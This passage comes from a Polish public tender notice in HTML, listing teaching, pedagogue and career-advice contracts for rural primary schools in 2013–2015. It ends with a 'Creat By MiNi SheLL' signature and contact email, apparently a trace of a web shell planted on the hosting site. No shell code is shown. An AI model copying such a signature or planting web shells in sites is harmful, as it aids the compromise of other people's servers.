Wykonawca wykonywać będzie powierzone mu obowiązki w czasie określonym łączną liczbą godzin zajęć. Wykonawca wykonywać będzie powierzone mu obowiązki zgodnie z programem zajęć, który sporządzi i przedstawi Zamawiającemu.  Wykonawca zobowiązany będzie do prowadzenia dziennika zajęć, teczki badań dziecka (w której będą wywiady z rodzicami, arkusze i wyniki badań , prace dzieci, itp.) oraz dokumentacji wynikającej ze specyfikacji projektu. Wykonawca zobowiązany będzie do prowadzenia i przedstawienia co miesiąc Karty Czasu Pracy. Płatności regulowane będą w okresach miesięcznych po przedstawieniu rachunku. Wykonawca wykonywać będzie powierzone mu obowiązki zgodnie z harmonogramem ustalonym przez Zamawiającego.
Kategorie wiekowe uczestników zajęć: uczniowie klasy IV, V oraz VI SP. 
Zajęcia prowadzone będą indywidualnie i grupowo.
Okres realizacji zadania październik 2013 - czerwiec 2015..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 80.00.00.00-4, 80.10.00.00-5.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 19.06.2015.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 20 <b>NAZWA:</b> PEDAGOG.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Niniejsze zamówienie obejmuje diagnozowanie i ocenianie rozwoju dzieci, w SP: w Dolicach, w Rzeplinie, w Sądowie, w Dobropolu, w wymiarze 136 h zegarowych w całym okresie trwania projektu, po 1 godzinie co dwa tygodnie w każdej SP.
Zajęcia będą się odbywały od poniedziałku do piątku w trakcie zajęć szkolnych lub bezpośrednio po nich. 

Zamawiający zastrzega możliwość zmiany ilości godzin prowadzonych zajęć  jeżeli zawarcie umów, zależne od przebiegu postępowania, nastąpi w terminie późniejszym niż planowany.
Wykonawca wykonywać będzie powierzone mu obowiązki w czasie określonym łączną liczbą godzin zajęć. Wykonawca wykonywać będzie powierzone mu obowiązki zgodnie z programem zajęć, który sporządzi i przedstawi Zamawiającemu. Wykonawca zobowiązany będzie do prowadzenia dziennika zajęć, teczki badań dziecka (w której będą wywiady z rodzicami, arkusze i wyniki badań , prace dzieci, itp.) oraz dokumentacji wynikającej ze specyfikacji projektu. Wykonawca zobowiązany będzie do prowadzenia i przedstawienia co miesiąc Karty Czasu Pracy. Płatności regulowane będą w okresach miesięcznych po przedstawieniu rachunku. Wykonawca wykonywać będzie powierzone mu obowiązki zgodnie z harmonogramem ustalonym przez Zamawiającego.
Kategorie wiekowe uczestników zajęć: uczniowie klasy IV, V oraz VI SP. 
Zajęcia prowadzone będą indywidualnie i grupowo.
Okres realizacji zadania październik 2013 - czerwiec 2015..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 80.00.00.00-4, 80.10.00.00-5.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 19.06.2015.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 21 <b>NAZWA:</b> NAUCZYCIEL JĘZYKA ANGIELSKIEGO W SP W DOBROPOLU.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Niniejsze zamówienie obejmuje prowadzenie zajęć z języka angielskiego w szkole podstawowej w Dobropolu, w wymiarze 102 h zegarowych w danej SP w całym okresie trwania projektu.
Minimum 40% godzin zajęć musi być przeprowadzonych z wykorzystaniem aktywizujących metod i technik pracy ICT z uczniem, m.in. gry dydaktyczne, nauka piosenek, drama, itp.
Zajęcia będą się odbywały od poniedziałku do piątku w trakcie zajęć szkolnych lub bezpośrednio po nich. 
Zajęcia z języka angielskiego w różnych szkołach podstawowych mogą się odbywać w te same dni i godziny.

Zamawiający zastrzega możliwość zmiany ilości godzin prowadzonych zajęć jeżeli zawarcie umów, zależne od przebiegu postępowania, nastąpi w terminie późniejszym niż planowany.
Wykonawca wykonywać będzie powierzone mu obowiązki w czasie określonym łączną liczbą godzin zajęć. Wykonawca wykonywać będzie powierzone mu obowiązki zgodnie z programem zajęć, który sporządzi i przedstawi Zamawiającemu. Wykonawca zobowiązany będzie do prowadzenia dziennika zajęć oraz dokumentacji wynikającej ze specyfikacji projektu. Wykonawca zobowiązany będzie do prowadzenia i przedstawienia co miesiąc Karty Czasu Pracy. Płatności regulowane będą w okresach miesięcznych po przedstawieniu rachunku. Wykonawca wykonywać będzie powierzone mu obowiązki zgodnie z harmonogramem ustalonym przez Zamawiającego.
Zajęcia prowadzone będą w 3 grupach (kl. IV, kl. V, kl. VI) 5-8osobowych,  po 1 godzinie co dwa tygodnie dla każdej grupy. 
Kategorie wiekowe uczestników zajęć: uczniowie klasy IV, V oraz VI SP. 
Okres realizacji zadania październik 2013 - czerwiec 2015..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 80.00.00.00-4, 80.10.00.00-5.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 19.06.2015.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 22 <b>NAZWA:</b> NAUCZYCIEL JĘZYKA ANGIELSKIEGO W SP W DOLICACH.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Niniejsze zamówienie obejmuje prowadzenie zajęć z języka angielskiego w szkole podstawowej w Dolicach, w wymiarze 102 h zegarowych w danej SP w całym okresie trwania projektu.
Minimum 40% godzin zajęć musi być przeprowadzonych z wykorzystaniem aktywizujących metod i technik pracy ICT z uczniem, m.in. gry dydaktyczne, nauka piosenek, drama, itp.
Zajęcia będą się odbywały od poniedziałku do piątku w trakcie zajęć szkolnych lub bezpośrednio po nich. 
Zajęcia z języka angielskiego w różnych szkołach podstawowych mogą się odbywać w te same dni i godziny.

Zamawiający zastrzega możliwość zmiany ilości godzin prowadzonych zajęć jeżeli zawarcie umów, zależne od przebiegu postępowania, nastąpi w terminie późniejszym niż planowany.
Wykonawca wykonywać będzie powierzone mu obowiązki w czasie określonym łączną liczbą godzin zajęć. Wykonawca wykonywać będzie powierzone mu obowiązki zgodnie z programem zajęć, który sporządzi i przedstawi Zamawiającemu. Wykonawca zobowiązany będzie do prowadzenia dziennika zajęć oraz dokumentacji wynikającej ze specyfikacji projektu. Wykonawca zobowiązany będzie do prowadzenia i przedstawienia co miesiąc Karty Czasu Pracy. Płatności regulowane będą w okresach miesięcznych po przedstawieniu rachunku. Wykonawca wykonywać będzie powierzone mu obowiązki zgodnie z harmonogramem ustalonym przez Zamawiającego.
Zajęcia prowadzone będą w 3 grupach (kl. IV, kl. V, kl. VI) 5-8osobowych,  po 1 godzinie co dwa tygodnie dla każdej grupy. 
Kategorie wiekowe uczestników zajęć: uczniowie klasy IV, V oraz VI SP. 
Okres realizacji zadania październik 2013 - czerwiec 2015..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 80.00.00.00-4, 80.10.00.00-5.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 19.06.2015.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 23 <b>NAZWA:</b> NAUCZYCIEL JĘZYKA ANGIELSKIEGO W SP W SĄDOWIE.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Niniejsze zamówienie obejmuje prowadzenie zajęć z języka angielskiego w szkole podstawowej w Sądowie, w wymiarze 102 h zegarowych w danej SP w całym okresie trwania projektu.
Minimum 40% godzin zajęć musi być przeprowadzonych z wykorzystaniem aktywizujących metod i technik pracy ICT z uczniem, m.in. gry dydaktyczne, nauka piosenek, drama, itp.
Zajęcia będą się odbywały od poniedziałku do piątku w trakcie zajęć szkolnych lub bezpośrednio po nich. 
Zajęcia z języka angielskiego w różnych szkołach podstawowych mogą się odbywać w te same dni i godziny.

Zamawiający zastrzega możliwość zmiany ilości godzin prowadzonych zajęć jeżeli zawarcie umów, zależne od przebiegu postępowania, nastąpi w terminie późniejszym niż planowany.
Wykonawca wykonywać będzie powierzone mu obowiązki w czasie określonym łączną liczbą godzin zajęć. Wykonawca wykonywać będzie powierzone mu obowiązki zgodnie z programem zajęć, który sporządzi i przedstawi Zamawiającemu. Wykonawca zobowiązany będzie do prowadzenia dziennika zajęć oraz dokumentacji wynikającej ze specyfikacji projektu. Wykonawca zobowiązany będzie do prowadzenia i przedstawienia co miesiąc Karty Czasu Pracy. Płatności regulowane będą w okresach miesięcznych po przedstawieniu rachunku. Wykonawca wykonywać będzie powierzone mu obowiązki zgodnie z harmonogramem ustalonym przez Zamawiającego.
Zajęcia prowadzone będą w 3 grupach (kl. IV, kl. V, kl. VI) 5-8osobowych,  po 1 godzinie co dwa tygodnie dla każdej grupy. 
Kategorie wiekowe uczestników zajęć: uczniowie klasy IV, V oraz VI SP. 
Okres realizacji zadania październik 2013 - czerwiec 2015..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 80.00.00.00-4, 80.10.00.00-5.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 19.06.2015.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 24 <b>NAZWA:</b> NAUCZYCIEL JĘZYKA ANGIELSKIEGO W SP W RZEPLINIE.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Niniejsze zamówienie obejmuje prowadzenie zajęć z języka angielskiego w szkole podstawowej w  Rzeplinie, w wymiarze 102 h zegarowych w danej SP w całym okresie trwania projektu.
Minimum 40% godzin zajęć musi być przeprowadzonych z wykorzystaniem aktywizujących metod i technik pracy ICT z uczniem, m.in. gry dydaktyczne, nauka piosenek, drama, itp.
Zajęcia będą się odbywały od poniedziałku do piątku w trakcie zajęć szkolnych lub bezpośrednio po nich. 
Zajęcia z języka angielskiego w różnych szkołach podstawowych mogą się odbywać w te same dni i godziny.

Zamawiający zastrzega możliwość zmiany ilości godzin prowadzonych zajęć jeżeli zawarcie umów, zależne od przebiegu postępowania, nastąpi w terminie późniejszym niż planowany.
Wykonawca wykonywać będzie powierzone mu obowiązki w czasie określonym łączną liczbą godzin zajęć. Wykonawca wykonywać będzie powierzone mu obowiązki zgodnie z programem zajęć, który sporządzi i przedstawi Zamawiającemu. Wykonawca zobowiązany będzie do prowadzenia dziennika zajęć oraz dokumentacji wynikającej ze specyfikacji projektu. Wykonawca zobowiązany będzie do prowadzenia i przedstawienia co miesiąc Karty Czasu Pracy. Płatności regulowane będą w okresach miesięcznych po przedstawieniu rachunku. Wykonawca wykonywać będzie powierzone mu obowiązki zgodnie z harmonogramem ustalonym przez Zamawiającego.
Zajęcia prowadzone będą w 3 grupach (kl. IV, kl. V, kl. VI) 5-8osobowych,  po 1 godzinie co dwa tygodnie dla każdej grupy. 
Kategorie wiekowe uczestników zajęć: uczniowie klasy IV, V oraz VI SP. 
Okres realizacji zadania październik 2013 - czerwiec 2015..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 80.00.00.00-4, 80.10.00.00-5.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 19.06.2015.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 25 <b>NAZWA:</b> DORADCA  ZAWODOWY.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Niniejsze zamówienie obejmuje prowadzenie zajęć z doradztwa zawodowego w SP: w Dobropolu, w Dolicach, w Rzeplinie, w Sądowie, w wymiarze 136 h zegarowych w całym okresie trwania projektu, po 1 godzinie co dwa tygodnie w każdej SP. 
Minimum 40% godzin zajęć musi być przeprowadzonych z wykorzystaniem aktywizujących metod i technik pracy ICT, np. burza mózgów, gra Max Career Game, analiza przypadku, itp.
Zajęcia będą się odbywały od poniedziałku do piątku w trakcie zajęć szkolnych lub bezpośrednio po nich. 

Zamawiający zastrzega możliwość zmiany ilości godzin prowadzonych zajęć  jeżeli zawarcie umów, zależne od przebiegu postępowania, nastąpi w terminie późniejszym niż planowany.
Wykonawca wykonywać będzie powierzone mu obowiązki w czasie określonym łączną liczbą godzin zajęć. Wykonawca wykonywać będzie powierzone mu obowiązki zgodnie z programem zajęć, który sporządzi i przedstawi Zamawiającemu. Wykonawca zobowiązany będzie do prowadzenia dziennika zajęć oraz dokumentacji wynikającej ze specyfikacji projektu. Wykonawca zobowiązany będzie do prowadzenia i przedstawienia co miesiąc Karty Czasu Pracy. Płatności regulowane będą w okresach miesięcznych po przedstawieniu rachunku. Wykonawca wykonywać będzie powierzone mu obowiązki zgodnie z harmonogramem ustalonym przez Zamawiającego.
Zajęcia prowadzone będą w 1 grupie (kl.VI) 5-8osobowej w każdej SP,  po 1 godzinie co dwa tygodnie dla każdej grupy. 
Kategorie wiekowe uczestników zajęć: uczniowie klasy VI SP. 
Okres realizacji zadania październik 2013 - czerwiec 2015..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 80.00.00.00-4, 80.10.00.00-5.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 19.06.2015.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>

Creat By MiNi SheLL
Email: jattceo@gmail.com